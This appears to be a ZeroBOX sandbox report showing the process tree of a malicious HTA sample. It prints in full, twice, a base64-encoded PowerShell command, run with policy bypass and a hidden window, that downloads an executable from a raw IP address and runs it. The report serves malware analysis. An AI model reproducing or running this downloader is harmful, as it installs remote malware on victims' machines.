popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\IE_NET.hta

    1648

    • PoWershelL.EXE "C:\Windows\System32\WINdOWSpoWERsHEll\v1.0\PoWershelL.EXE" "pOwERshELL -ex byPaSS -NOp -w 1 -ec IAAgAFsATgBlAHQALgBTAEUAUgB2AGkAYwBlAFAAbwBJAE4AVABtAGEATgBhAEcARQByAF0AOgA6AFMAZQBDAHUAUgBpAHQAWQBwAFIAbwBUAG8AQwBvAGwAIAAgAAkACQAgACAAPQAgACAAWwBOAEUAdAAuAHMARQBjAHUAcgBJAFQAWQBwAHIATwB0AE8AQwBvAGwAVABZAFAAZQBdADoAOgBUAGwAcwAxADIAIAAJACAAIAA7ACAAIAAJACAACQAJAAkACQAJACAACQAgACAAIAAgACAAIAAgAHcARwBFAFQAIAAgACAAIAAoAB0gaAB0AHQAcAA6AC8ALwAyADMALgA5ADQALgAyADMANgAuADIAMAAzAC8ANwAzADAALwBJAEIATQBfAGMAHSAgACAACQAJAAkACQAgAAkAIAAJACAACQAgACAACQAgACAACQAJAAkACQAgAAkAIAAJACAACQAgACAACQArACAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJAB0gZQAdICAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJACAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJACsAIAAgAAkACQAJAAkAIAAJACAACQAgAAkAIAAgAAkAHSBuAHQAcwAuAGUAeAAdICAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJACAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJACsAIAAgAAkACQAJAAkAIAAJACAACQAgAAkAIAAgAAkAHSBlAB0gIAAgAAkACQAJAAkAIAAJACAACQAgAAkAIAAgAAkAKQAgACAACQAJAAkAIAAgAC0AbwB1AHQAZgBJAEwAZQAgAAkACQAJAAkACQAJAAkAHSAkAEUAbgBWADoAdABlAE0AUABcAEkAQgBNAF8AQwBlAG4AdABvAHMAcwAuAGUAeABlAB0gIAAgACAAIAAgACAAIAAgADsAIAAJAAkACQAJAAkACQAJAAkACQBTAFQAQQByAHQAIAAgACAAIAAgACAAHSAkAEUATgBWADoAdABFAG0AcABcAEkAQgBNAF8AQwBlAG4AdABvAHMAcwAuAGUAeABlAB0g "

      2088

      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex byPaSS -NOp -w 1 -ec IAAgAFsATgBlAHQALgBTAEUAUgB2AGkAYwBlAFAAbwBJAE4AVABtAGEATgBhAEcARQByAF0AOgA6AFMAZQBDAHUAUgBpAHQAWQBwAFIAbwBUAG8AQwBvAGwAIAAgAAkACQAgACAAPQAgACAAWwBOAEUAdAAuAHMARQBjAHUAcgBJAFQAWQBwAHIATwB0AE8AQwBvAGwAVABZAFAAZQBdADoAOgBUAGwAcwAxADIAIAAJACAAIAA7ACAAIAAJACAACQAJAAkACQAJACAACQAgACAAIAAgACAAIAAgAHcARwBFAFQAIAAgACAAIAAoAB0gaAB0AHQAcAA6AC8ALwAyADMALgA5ADQALgAyADMANgAuADIAMAAzAC8ANwAzADAALwBJAEIATQBfAGMAHSAgACAACQAJAAkACQAgAAkAIAAJACAACQAgACAACQAgACAACQAJAAkACQAgAAkAIAAJACAACQAgACAACQArACAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJAB0gZQAdICAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJACAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJACsAIAAgAAkACQAJAAkAIAAJACAACQAgAAkAIAAgAAkAHSBuAHQAcwAuAGUAeAAdICAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJACAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJACsAIAAgAAkACQAJAAkAIAAJACAACQAgAAkAIAAgAAkAHSBlAB0gIAAgAAkACQAJAAkAIAAJACAACQAgAAkAIAAgAAkAKQAgACAACQAJAAkAIAAgAC0AbwB1AHQAZgBJAEwAZQAgAAkACQAJAAkACQAJAAkAHSAkAEUAbgBWADoAdABlAE0AUABcAEkAQgBNAF8AQwBlAG4AdABvAHMAcwAuAGUAeABlAB0gIAAgACAAIAAgACAAIAAgADsAIAAJAAkACQAJAAkACQAJAAkACQBTAFQAQQByAHQAIAAgACAAIAAgACAAHSAkAEUATgBWADoAdABFAG0AcABcAEkAQgBNAF8AQwBlAG4AdABvAHMAcwAuAGUAeABlAB0g

        2220

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf